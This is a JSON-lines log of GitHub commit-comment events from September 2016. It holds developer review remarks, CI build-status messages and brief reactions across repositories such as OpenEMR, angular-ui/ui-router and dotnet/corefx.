{"id":"4558997941","type":"CommitCommentEvent","actor":{"login":"juggernautsei"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":19010921,"position":109,"line":109,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-13T23:45:42Z","updated_at":"2016-09-13T23:45:42Z","body":"unsure. I have to wait till I get to a place where I can unravel the other developers code. "}},"created_at":"2016-09-13T23:45:42Z"}
{"id":"4558998464","type":"CommitCommentEvent","actor":{"login":"connornishijima"},"repo":{"name":"connornishijima/ATtiny-playtune"},"payload":{"comment":{"id":19010926,"position":null,"line":null,"path":null,"commit_id":"ddb014fdad7100d2ac8f550c52064b4709fc2ade","created_at":"2016-09-13T23:45:52Z","updated_at":"2016-09-13T23:45:52Z","body":"This fixes an issue where the accumulator throws out division remainders leading to \"frequency stepping\" in higher frequencies. The code now matches the comment block showing pseudocode for this function."}},"created_at":"2016-09-13T23:45:52Z"}
{"id":"4558998536","type":"CommitCommentEvent","actor":{"login":"earlyster"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19010927,"position":19,"line":19,"path":"packages/ng1-bower/webpack.config.js","commit_id":"3a1160d30cad275af9eb5c9e5142714b974123e6","created_at":"2016-09-13T23:45:53Z","updated_at":"2016-09-13T23:45:53Z","body":"When using require js to load angular-ui-router and stateEvents ... stateEvents is never loaded because umd module has the same name as angular-ui-router."}},"created_at":"2016-09-13T23:45:53Z"}
{"id":"4559000217","type":"CommitCommentEvent","actor":{"login":"Klozz"},"repo":{"name":"XPerience-AOSP-Lollipop/android_frameworks_base"},"payload":{"comment":{"id":19010933,"position":null,"line":null,"path":null,"commit_id":"2dfed08cc22b5342bd0a8269fa98c08c1b4eada5","created_at":"2016-09-13T23:46:22Z","updated_at":"2016-09-13T23:46:22Z","body":"It can be reverted if have problems\r\n"}},"created_at":"2016-09-13T23:46:22Z"}
{"id":"4559002425","type":"CommitCommentEvent","actor":{"login":"juggernautsei"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":19010937,"position":187,"line":187,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-13T23:47:03Z","updated_at":"2016-09-13T23:47:03Z","body":"This was given to you before I moved it to the globals. I have to move the physician code to the user profile page so that there can be more than one physician on an account. "}},"created_at":"2016-09-13T23:47:03Z"}
{"id":"4559004584","type":"CommitCommentEvent","actor":{"login":"piotr-yuxuan"},"repo":{"name":"piotr-yuxuan/polygam"},"payload":{"comment":{"id":19010940,"position":null,"line":null,"path":null,"commit_id":"5e9bb3e2d79772af579feb4218848a98a210c3cf","created_at":"2016-09-13T23:47:43Z","updated_at":"2016-09-13T23:47:43Z","body":"http://www.lix.polytechnique.fr/~dale/papers/wollic03.pdf\r\nProof of logic programming"}},"created_at":"2016-09-13T23:47:43Z"}
{"id":"4559004675","type":"CommitCommentEvent","actor":{"login":"christopherthielen"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19010941,"position":19,"line":19,"path":"packages/ng1-bower/webpack.config.js","commit_id":"3a1160d30cad275af9eb5c9e5142714b974123e6","created_at":"2016-09-13T23:47:44Z","updated_at":"2016-09-13T23:47:44Z","body":"doh!  will you file a bug?"}},"created_at":"2016-09-13T23:47:44Z"}
{"id":"4559004963","type":"CommitCommentEvent","actor":{"login":"earlyster"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19010942,"position":19,"line":19,"path":"packages/ng1-bower/webpack.config.js","commit_id":"3a1160d30cad275af9eb5c9e5142714b974123e6","created_at":"2016-09-13T23:47:49Z","updated_at":"2016-09-13T23:47:49Z","body":"FYI... I was trying to replace\r\n\r\n$scope.$on('$stateChangeSuccess', function (event, toState, toParams, fromState) {\r\n\r\n}) \r\n\r\nhandler with new transitions but it wasn't clear how do we do this.\r\n   "}},"created_at":"2016-09-13T23:47:49Z"}
{"id":"4559007037","type":"CommitCommentEvent","actor":{"login":"juggernautsei"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":19010944,"position":246,"line":246,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-13T23:48:25Z","updated_at":"2016-09-13T23:48:25Z","body":" I found out that the developer used a program to generate the wsdl connection code then do as we all do, modified that to fit our needs. So it may look odd but it works. "}},"created_at":"2016-09-13T23:48:25Z"}
{"id":"4559009087","type":"CommitCommentEvent","actor":{"login":"christopherthielen"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19010953,"position":19,"line":19,"path":"packages/ng1-bower/webpack.config.js","commit_id":"3a1160d30cad275af9eb5c9e5142714b974123e6","created_at":"2016-09-13T23:49:00Z","updated_at":"2016-09-13T23:49:00Z","body":"> it wasn't clear how do we do this.\r\n\r\n```js\r\n$transitions.onSuccess({}, function(transition) {\r\n  var toState = transition.to();\r\n  var toParams = transition.params();\r\n  var fromState = transitoin.from();\r\n  ...\r\n});\r\n```"}},"created_at":"2016-09-13T23:49:00Z"}
{"id":"4559011650","type":"CommitCommentEvent","actor":{"login":"andrebellafronte"},"repo":{"name":"eunarede/iugu-whmcs-pro"},"payload":{"comment":{"id":19010955,"position":5,"line":16,"path":"modules/gateways/iugu_boleto.php","commit_id":"a140534e44bef7d3178fafac36c8a40d7c8976cd","created_at":"2016-09-13T23:49:45Z","updated_at":"2016-09-13T23:49:45Z","body":"ta errado!"}},"created_at":"2016-09-13T23:49:45Z"}
{"id":"4559011654","type":"CommitCommentEvent","actor":{"login":"juggernautsei"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":19010956,"position":30,"line":30,"path":"interface/weno/markTx.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-13T23:49:45Z","updated_at":"2016-09-13T23:49:45Z","body":"Ok will do"}},"created_at":"2016-09-13T23:49:45Z"}
{"id":"4559012298","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19010957,"position":32,"line":3,"path":"src/System.Data.SqlClient/tests/StressTests/System.Data.SqlClient.Stress.Tests/project.json","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T23:49:57Z","updated_at":"2016-09-13T23:49:57Z","body":"Is the plan continue reference beta-devapi packages for a build and then update after we get a set of packages published? "}},"created_at":"2016-09-13T23:49:57Z"}
{"id":"4559012455","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19010959,"position":null,"line":null,"path":null,"commit_id":"8dc4bfca7435b5b65be4af7fb657e80ac328cd63","created_at":"2016-09-13T23:50:00Z","updated_at":"2016-09-13T23:50:00Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2302 of 2469 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dc4bfca7435b5b65be4af7fb657e80ac328cd63-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8dc4bfca7435b5b65be4af7fb657e80ac328cd63-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.24%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T23:50:00Z"}
{"id":"4559015085","type":"CommitCommentEvent","actor":{"login":"mohit3wadhwa"},"repo":{"name":"mohit3wadhwa/Tech-Era"},"payload":{"comment":{"id":19010963,"position":null,"line":null,"path":null,"commit_id":"9de621f0b2549d6f4e8a0d7e096e58b70939e12b","created_at":"2016-09-13T23:50:47Z","updated_at":"2016-09-13T23:50:47Z","body":":)"}},"created_at":"2016-09-13T23:50:47Z"}
{"id":"4559016249","type":"CommitCommentEvent","actor":{"login":"mohit3wadhwa"},"repo":{"name":"mohit3wadhwa/Tech-Era"},"payload":{"comment":{"id":19010965,"position":3,"line":2,"path":"README.md","commit_id":"9de621f0b2549d6f4e8a0d7e096e58b70939e12b","created_at":"2016-09-13T23:51:11Z","updated_at":"2016-09-13T23:51:11Z","body":"what was that?"}},"created_at":"2016-09-13T23:51:11Z"}
{"id":"4559018598","type":"CommitCommentEvent","actor":{"login":"tristanpenman"},"repo":{"name":"0x4d52/valijson"},"payload":{"comment":{"id":19010968,"position":null,"line":null,"path":null,"commit_id":"2e9d147c9905347cf3ae8ddeea337674905001ee","created_at":"2016-09-13T23:51:51Z","updated_at":"2016-09-13T23:51:51Z","body":"By chance, I just had a look at your fork of valijson and noticed this fix. Nice catch. This will make for an easy PR whenever you want to open one."}},"created_at":"2016-09-13T23:51:51Z"}
{"id":"4559019144","type":"CommitCommentEvent","actor":{"login":"leocabral"},"repo":{"name":"felipevolpone/ray"},"payload":{"comment":{"id":19010971,"position":null,"line":null,"path":null,"commit_id":"62282d3f6cb1e107beebf923c9c762c321bfff8a","created_at":"2016-09-13T23:52:02Z","updated_at":"2016-09-13T23:52:02Z","body":"👍 "}},"created_at":"2016-09-13T23:52:02Z"}
{"id":"4559019402","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19010972,"position":4,"line":12,"path":"src/System.IO.FileSystem/tests/FileStream/CopyToAsync.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T23:52:07Z","updated_at":"2016-09-13T23:52:07Z","body":"@justinvp are you still updating this attribute? Once we get the dev/api branch gets merged into master we should clean these up. "}},"created_at":"2016-09-13T23:52:07Z"}
{"id":"4559021922","type":"CommitCommentEvent","actor":{"login":"mattyx14"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19010976,"position":null,"line":null,"path":null,"commit_id":"782edece51565b5f5c728852947b0f6df6c8affb","created_at":"2016-09-13T23:52:50Z","updated_at":"2016-09-13T23:52:50Z","body":"More info for login with client 11\r\nhttp://www.tibiaking.com/forum/forums/topic/68411-otxserver-37-global-75-full-com-otherworld-pvp-expert-novo-castsystem-npcs-usando-bank-balance-tibia-store-e-varias-outros-sistema/?page=39#comment-420400"}},"created_at":"2016-09-13T23:52:50Z"}
{"id":"4559024065","type":"CommitCommentEvent","actor":{"login":"tristanpenman"},"repo":{"name":"0x4d52/valijson"},"payload":{"comment":{"id":19010987,"position":null,"line":null,"path":null,"commit_id":"2e9d147c9905347cf3ae8ddeea337674905001ee","created_at":"2016-09-13T23:53:26Z","updated_at":"2016-09-13T23:53:26Z","body":"Alternatively, I'll apply the same fix when I'm making a few changes later this week."}},"created_at":"2016-09-13T23:53:26Z"}
{"id":"4559025742","type":"CommitCommentEvent","actor":{"login":"oozie"},"repo":{"name":"oozie/fsnotify"},"payload":{"comment":{"id":19010991,"position":null,"line":null,"path":null,"commit_id":"270485b8b02987f01abf1245d2da224d8cd40930","created_at":"2016-09-13T23:53:55Z","updated_at":"2016-09-13T23:53:55Z","body":"Thanks for input, guys!\r\n* Fair point. I'll add tests for REMOVE and RENAME. \r\n* This library uses golang's built-in testing facilities.\r\n* I'll keep the copyright in line with all existing test files in the library."}},"created_at":"2016-09-13T23:53:55Z"}
{"id":"4559026550","type":"CommitCommentEvent","actor":{"login":"randerzander"},"repo":{"name":"kotobot/docker-hdp"},"payload":{"comment":{"id":19010992,"position":null,"line":null,"path":null,"commit_id":"fa772c989c281b1daae818b4c4ed09d80e907073","created_at":"2016-09-13T23:54:10Z","updated_at":"2016-09-13T23:54:10Z","body":"great catch! I fixed this in master as well."}},"created_at":"2016-09-13T23:54:10Z"}
{"id":"4559028682","type":"CommitCommentEvent","actor":{"login":"imis737"},"repo":{"name":"imis737/MSA-Website"},"payload":{"comment":{"id":19010993,"position":null,"line":null,"path":null,"commit_id":"f231ad278db856f9cc3211b34b19c12279c390fc","created_at":"2016-09-13T23:54:49Z","updated_at":"2016-09-13T23:54:49Z","body":"Wowzers!"}},"created_at":"2016-09-13T23:54:49Z"}
{"id":"4559029425","type":"CommitCommentEvent","actor":{"login":"smokR-spr"},"repo":{"name":"TheMathematicians/physio-app"},"payload":{"comment":{"id":19010994,"position":null,"line":null,"path":null,"commit_id":"c0e222929b3b83bf0793a2f0f8f514126ece3c69","created_at":"2016-09-13T23:55:02Z","updated_at":"2016-09-13T23:55:02Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;YHUCAEUh&#x2F;3-create-a-project-repo-under-themathematicians-organization-on-git\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create a project repo under TheMathematicians organization on Git.</a>"}},"created_at":"2016-09-13T23:55:02Z"}
{"id":"4559033469","type":"CommitCommentEvent","actor":{"login":"EvanYates"},"repo":{"name":"githubschool/open-enrollment-classes-introduction-to-github"},"payload":{"comment":{"id":19011007,"position":null,"line":null,"path":null,"commit_id":"05b48ecc66063ba110ff47faec3a3b39f5e28f10","created_at":"2016-09-13T23:56:12Z","updated_at":"2016-09-13T23:56:12Z","body":"Adding Pin for my username as instructed by @githubteacher\r\ncloses #716 "}},"created_at":"2016-09-13T23:56:12Z"}
{"id":"4559033576","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19011008,"position":null,"line":null,"path":null,"commit_id":"79fa859bb0621903ea4191dc40bf75ae1c63a579","created_at":"2016-09-13T23:56:15Z","updated_at":"2016-09-13T23:56:15Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-13T23:56:15Z"}
{"id":"4559043093","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19011024,"position":32,"line":3,"path":"src/System.Data.SqlClient/tests/StressTests/System.Data.SqlClient.Stress.Tests/project.json","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T23:59:06Z","updated_at":"2016-09-13T23:59:06Z","body":"Yes, that is the plan."}},"created_at":"2016-09-13T23:59:06Z"}
{"id":"4559043106","type":"CommitCommentEvent","actor":{"login":"DarkGuardsman"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":19011025,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T23:59:07Z","updated_at":"2016-09-13T23:59:07Z","body":"I just had an idea, the canExtrat and canReceive could be replaced with getters for getExtraLimit() and getReceiveLimit() since the prefab implements both of those values. This would cover the functionality of the can method and would provide additional information about internal implementation."}},"created_at":"2016-09-13T23:59:07Z"}
{"id":"4553163909","type":"CommitCommentEvent","actor":{"login":"loustler"},"repo":{"name":"codechobostudy/movie-api"},"payload":{"comment":{"id":18995382,"position":114,"line":87,"path":"src/main/java/io/codechobo/domain/member/Member.java","commit_id":"0acd11a72f9f5e25beafc665ab393d38d827c89b","created_at":"2016-09-13T03:00:03Z","updated_at":"2016-09-13T03:00:03Z","body":"@devsejong 포인트 증가가 되면 포인트를 체크를 해서 Level을 변경하게끔 말씀이시죠?\r\nPreUpdate 와 같은 method를 이용해서 하는 걸 말씀하시는 거죠?"}},"created_at":"2016-09-13T03:00:03Z"}
{"id":"4553165245","type":"CommitCommentEvent","actor":{"login":"tony-kerz"},"repo":{"name":"mzabriskie/axios"},"payload":{"comment":{"id":18995389,"position":null,"line":null,"path":null,"commit_id":"b8f6f5049cf3da8126a184b6b270316402b5b374","created_at":"2016-09-13T03:00:29Z","updated_at":"2016-09-13T03:00:29Z","body":"thanks ruben,\r\n\r\nsorry about that, dumb cut-and-paste oversight from the preceding test.\r\n\r\nbest,\r\ntony.\r\n\r\n"}},"created_at":"2016-09-13T03:00:29Z"}
{"id":"4553168872","type":"CommitCommentEvent","actor":{"login":"paulfalgout"},"repo":{"name":"RoundingWellOS/marionette.toolkit"},"payload":{"comment":{"id":18995395,"position":4,"line":89,"path":"docs/mixins/state.md","commit_id":"07c9a4c78b024c9036aa3fc99909b0f84ddb6b07","created_at":"2016-09-13T03:01:48Z","updated_at":"2016-09-13T03:01:48Z","body":"Hmm.  This is a bit unfortunate that you can't specify the app's StateModel class upon instantiation.  Do you think we should support it?  It would mean adding it to the app's ClassOptions and mixing it in to the options as a default ala: `const opts = _.extend({}, { StateModel: this.StateModel }, options);`\r\n\r\nAlso throughout this doc `Marionette.Toolkit.App` should probably change to `Marionette.Object` or perhaps `Marionette.View` and `MyView` is a more likely way of using it.  Calling initState on an App is odd as it already has the functionality."}},"created_at":"2016-09-13T03:01:48Z"}
{"id":"4553170632","type":"CommitCommentEvent","actor":{"login":"zfi"},"repo":{"name":"parallaxinc/BlocklyProp"},"payload":{"comment":{"id":18995400,"position":null,"line":null,"path":null,"commit_id":"0b6d6363cee652bf883e33074ca5ebaf91f5a2c9","created_at":"2016-09-13T03:02:27Z","updated_at":"2016-09-13T03:02:27Z","body":"Can you drop the <br/> from the index.jsp?  Use CSS to create more vertical space as needed"}},"created_at":"2016-09-13T03:02:27Z"}
{"id":"4553178498","type":"CommitCommentEvent","actor":{"login":"schaeffer07"},"repo":{"name":"schaeffer07/hello-world"},"payload":{"comment":{"id":18995417,"position":null,"line":null,"path":null,"commit_id":"ed3de9a89d8766a593be8d5ad8716f5bd9bdbdb6","created_at":"2016-09-13T03:05:20Z","updated_at":"2016-09-13T03:05:20Z","body":"test test"}},"created_at":"2016-09-13T03:05:20Z"}
{"id":"4553178984","type":"CommitCommentEvent","actor":{"login":"schaeffer07"},"repo":{"name":"schaeffer07/hello-world"},"payload":{"comment":{"id":18995418,"position":null,"line":null,"path":null,"commit_id":"ed3de9a89d8766a593be8d5ad8716f5bd9bdbdb6","created_at":"2016-09-13T03:05:30Z","updated_at":"2016-09-13T03:05:30Z","body":"ddd"}},"created_at":"2016-09-13T03:05:30Z"}
{"id":"4553180253","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":18995454,"position":9,"line":21,"path":"app/mailers/parti_mailer.rb","commit_id":"1b788da5b7ccfd99f4f03aa6229cb44d40dd18df","created_at":"2016-09-13T03:05:59Z","updated_at":"2016-09-13T03:05:59Z","body":"#{}을 쓰면 어땠을까요?"}},"created_at":"2016-09-13T03:05:59Z"}
{"id":"4553181485","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18995456,"position":null,"line":null,"path":null,"commit_id":"d43917d9573d94ed68ba214ff5e72aadbc75e3a0","created_at":"2016-09-13T03:06:14Z","updated_at":"2016-09-13T03:06:14Z","body":"Related to: backdrop/backdrop-issues#2163 "}},"created_at":"2016-09-13T03:06:14Z"}
{"id":"4553181494","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18995457,"position":null,"line":null,"path":null,"commit_id":"42b092a6050d01811cd9cc99620f6a02ce0f6e37","created_at":"2016-09-13T03:06:14Z","updated_at":"2016-09-13T03:06:14Z","body":"Related to: backdrop/backdrop-issues#2163 "}},"created_at":"2016-09-13T03:06:14Z"}
{"id":"4553181514","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18995458,"position":null,"line":null,"path":null,"commit_id":"aecc8c77a2d33f90c494cbb429597134abe68aa2","created_at":"2016-09-13T03:06:14Z","updated_at":"2016-09-13T03:06:14Z","body":"Related to: backdrop/backdrop-issues#2163 "}},"created_at":"2016-09-13T03:06:14Z"}
{"id":"4553197415","type":"CommitCommentEvent","actor":{"login":"hagijyun"},"repo":{"name":"stan-ja/stan-ja"},"payload":{"comment":{"id":18995484,"position":null,"line":null,"path":null,"commit_id":"d40ada82c8ef80aa1253071be9adc6aebea66bda","created_at":"2016-09-13T03:12:12Z","updated_at":"2016-09-13T03:12:12Z","body":"ご検討ならびにご対応ありがとうございました。\r\n該当部分の修正について確認いたしました。\r\n\r\nその他の部分も（手ごわいですが．．．）確認中ですので、改めてまとめてコメントをさせていただきたいと思います。\r\nよろしくお願いします。"}},"created_at":"2016-09-13T03:12:12Z"}
{"id":"4553200363","type":"CommitCommentEvent","actor":{"login":"hGriff0n"},"repo":{"name":"hGriff0n/hGriff0n.github.io"},"payload":{"comment":{"id":18995488,"position":null,"line":null,"path":null,"commit_id":"e3ffebb9a19b5ed6d7cbb0676881576a8db220ad","created_at":"2016-09-13T03:13:20Z","updated_at":"2016-09-13T03:13:20Z","body":"This also adds an experimental attempt to get text to fill mobile display better (the @media addition)"}},"created_at":"2016-09-13T03:13:20Z"}
{"id":"4553206316","type":"CommitCommentEvent","actor":{"login":"amdn"},"repo":{"name":"isocpp/CppCoreGuidelines"},"payload":{"comment":{"id":18995498,"position":131,"line":11281,"path":"CppCoreGuidelines.md","commit_id":"0aea7d997b12e2ac93fce8150e7c74904c9d0c4f","created_at":"2016-09-13T03:15:32Z","updated_at":"2016-09-13T03:15:32Z","body":"where it says \"match\" should say \"element that is _not less_ than value\"\r\n"}},"created_at":"2016-09-13T03:15:32Z"}
{"id":"4553209186","type":"CommitCommentEvent","actor":{"login":"hageplane"},"repo":{"name":"hageplane/07_CocosbanGame_js"},"payload":{"comment":{"id":18995503,"position":12,"line":106,"path":"src/app.js","commit_id":"f32ff13e82203e5b884819f1d0c06631483a0834","created_at":"2016-09-13T03:16:39Z","updated_at":"2016-09-13T03:16:39Z","body":"f(distX>0){\r\n -              playerSprite.setPosition(playerSprite.getPosition().x+25,playerSprite.getPosition().y);\r\n -                //move(-1,0);"}},"created_at":"2016-09-13T03:16:39Z"}
{"id":"4553209483","type":"CommitCommentEvent","actor":{"login":"teconomo"},"repo":{"name":"teconomo/itmd-361-pp"},"payload":{"comment":{"id":18995505,"position":null,"line":null,"path":null,"commit_id":"21d90f97a4aa37a605d951b346f9df1b28c81976","created_at":"2016-09-13T03:16:46Z","updated_at":"2016-09-13T03:16:46Z","body":"for some reason, only the first two commits showed at first even though I did all 5 but then I realized I did not write \"git add\" for each commit, hence the problem haha. Now all 5 should be there and the code is correct, just if you were curious on what is here! \r\n\r\nTheo"}},"created_at":"2016-09-13T03:16:46Z"}
{"id":"4553211269","type":"CommitCommentEvent","actor":{"login":"YuukiRx46"},"repo":{"name":"YuukiRx46/07_CocosbanGame_js"},"payload":{"comment":{"id":18995510,"position":40,"line":120,"path":"src/app.js","commit_id":"f32ff13e82203e5b884819f1d0c06631483a0834","created_at":"2016-09-13T03:17:29Z","updated_at":"2016-09-13T03:17:29Z","body":"playerSprite.setPosition(playerSprite.getPosition().x,playerSprite.getPosition().y-25);\r\n\r\n-25じゃなくて50でいいんじゃないか?"}},"created_at":"2016-09-13T03:17:29Z"}
{"id":"4553211322","type":"CommitCommentEvent","actor":{"login":"chanman55555"},"repo":{"name":"chanman55555/07_CocosbanGame_js"},"payload":{"comment":{"id":18995511,"position":16,"line":109,"path":"src/app.js","commit_id":"f32ff13e82203e5b884819f1d0c06631483a0834","created_at":"2016-09-13T03:17:31Z","updated_at":"2016-09-13T03:17:31Z","body":"playerSprite.setPosition(playerSprite.getPosition().x-25,playerSprite.getPosition().y);\r\n -                //move(1,0);\r\n\r\n－25じゃなくて50でいいんじゃない？　"}},"created_at":"2016-09-13T03:17:31Z"}
{"id":"4553211459","type":"CommitCommentEvent","actor":{"login":"abechan"},"repo":{"name":"abechan/07_CocosbanGame_js"},"payload":{"comment":{"id":18995512,"position":40,"line":120,"path":"src/app.js","commit_id":"f32ff13e82203e5b884819f1d0c06631483a0834","created_at":"2016-09-13T03:17:34Z","updated_at":"2016-09-13T03:17:34Z","body":" playerSprite.setPosition(playerSprite.getPosition().x,playerSprite.getPosition().y**-25**);\r\n\r\n-25じゃなくて50でいいんじゃね？"}},"created_at":"2016-09-13T03:17:34Z"}
{"id":"4553212184","type":"CommitCommentEvent","actor":{"login":"ZakaramJN424"},"repo":{"name":"ZakaramJN424/07_CocosbanGame_js"},"payload":{"comment":{"id":18995513,"position":39,"line":119,"path":"src/app.js","commit_id":"f32ff13e82203e5b884819f1d0c06631483a0834","created_at":"2016-09-13T03:17:48Z","updated_at":"2016-09-13T03:17:48Z","body":"playerSprite.setPosition(playerSprite.getPosition().x,playerSprite.getPosition().y-25);\r\n-25じゃなくて50がいいと思う"}},"created_at":"2016-09-13T03:17:48Z"}
{"id":"4553213490","type":"CommitCommentEvent","actor":{"login":"pleb"},"repo":{"name":"damoclark/buzzer.click"},"payload":{"comment":{"id":18995516,"position":5,"line":16,"path":"lib/BuzzerServer.js","commit_id":"9b160720db59399ff5fa14cafc2c53dc746e5fa8","created_at":"2016-09-13T03:18:17Z","updated_at":"2016-09-13T03:18:17Z","body":"Try not to commit changes like this, as it's for you only, and not the source as a whole"}},"created_at":"2016-09-13T03:18:17Z"}
{"id":"4553213657","type":"CommitCommentEvent","actor":{"login":"Kamada1011"},"repo":{"name":"Kamada1011/07_CocosbanGame_js"},"payload":{"comment":{"id":18995517,"position":29,"line":116,"path":"src/app.js","commit_id":"f32ff13e82203e5b884819f1d0c06631483a0834","created_at":"2016-09-13T03:18:20Z","updated_at":"2016-09-13T03:18:20Z","body":"playerSprite.setPosition(playerSprite.getPosition().x-**25**,playerSprite.getPosition().y); \r\n\r\nここを５０にしては？"}},"created_at":"2016-09-13T03:18:20Z"}
{"id":"4553214302","type":"CommitCommentEvent","actor":{"login":"khipkin"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":18995518,"position":null,"line":null,"path":null,"commit_id":"f20a7b851f1a32d7611c73aa8267fb82e594ff80","created_at":"2016-09-13T03:18:34Z","updated_at":"2016-09-13T03:18:34Z","body":"There is _**tons**_ of localization stuff in here, too! :scream: Was that intentional?"}},"created_at":"2016-09-13T03:18:34Z"}
{"id":"4553214989","type":"CommitCommentEvent","actor":{"login":"nsuke"},"repo":{"name":"apache/thrift"},"payload":{"comment":{"id":18995521,"position":null,"line":null,"path":null,"commit_id":"8252577ec9da25f027b9edfa6876f9d9a0094566","created_at":"2016-09-13T03:18:49Z","updated_at":"2016-09-13T03:18:49Z","body":"@GuoguangLan adding a fallback `#else` clause after  `#elif _THRIFT_USING_GNU_LIBSTDCXX` would suffice.\r\nCan you file an issue on our JIRA and provide a pull request ?\r\nhttps://github.com/apache/thrift/blob/master/CONTRIBUTING.md"}},"created_at":"2016-09-13T03:18:49Z"}
{"id":"4553215565","type":"CommitCommentEvent","actor":{"login":"pershik"},"repo":{"name":"privet-team/minijava-compiler"},"payload":{"comment":{"id":18995522,"position":20,"line":18,"path":"pcj/grammar/Statement.h","commit_id":"7a26700064822bc49f3b3b13231ac0d00e5f12b4","created_at":"2016-09-13T03:19:04Z","updated_at":"2016-09-13T03:19:04Z","body":"Пока предлагаю оставить так. Если будут дальнейшие неудобства --- заменим."}},"created_at":"2016-09-13T03:19:04Z"}
{"id":"4553216676","type":"CommitCommentEvent","actor":{"login":"hosokawa9360"},"repo":{"name":"hosokawa9360/03_HelloWorld_noStudio"},"payload":{"comment":{"id":18995527,"position":21,"line":21,"path":"main.js","commit_id":"bcc05b1f53d3ff0896792cde51fe0334fefb059c","created_at":"2016-09-13T03:19:27Z","updated_at":"2016-09-13T03:19:27Z","body":"test"}},"created_at":"2016-09-13T03:19:27Z"}
{"id":"4553218077","type":"CommitCommentEvent","actor":{"login":"hosokawa9360"},"repo":{"name":"hosokawa9360/03_HelloWorld_noStudio"},"payload":{"comment":{"id":18995530,"position":29,"line":29,"path":"main.js","commit_id":"bcc05b1f53d3ff0896792cde51fe0334fefb059c","created_at":"2016-09-13T03:19:58Z","updated_at":"2016-09-13T03:19:58Z","body":"aaaa"}},"created_at":"2016-09-13T03:19:58Z"}
{"id":"4553218841","type":"CommitCommentEvent","actor":{"login":"hosokawa9360"},"repo":{"name":"hosokawa9360/03_HelloWorld_noStudio"},"payload":{"comment":{"id":18995532,"position":34,"line":34,"path":"main.js","commit_id":"bcc05b1f53d3ff0896792cde51fe0334fefb059c","created_at":"2016-09-13T03:20:13Z","updated_at":"2016-09-13T03:20:13Z","body":"bbbb"}},"created_at":"2016-09-13T03:20:13Z"}
{"id":"4553219292","type":"CommitCommentEvent","actor":{"login":"derek-damron"},"repo":{"name":"DexGroves/talks"},"payload":{"comment":{"id":18995534,"position":null,"line":null,"path":null,"commit_id":"f6eb65d90358a380c1b37b7d11a727ccb3fa7739","created_at":"2016-09-13T03:20:22Z","updated_at":"2016-09-13T03:20:22Z","body":":blush: "}},"created_at":"2016-09-13T03:20:22Z"}
{"id":"4553221395","type":"CommitCommentEvent","actor":{"login":"aboutZZ"},"repo":{"name":"aboutZZ/AnswerSheetViwer"},"payload":{"comment":{"id":18995538,"position":null,"line":null,"path":null,"commit_id":"e8b940d3d5448e454226bdf425a5b73f0ec2e819","created_at":"2016-09-13T03:21:12Z","updated_at":"2016-09-13T03:21:12Z","body":"first commit"}},"created_at":"2016-09-13T03:21:12Z"}
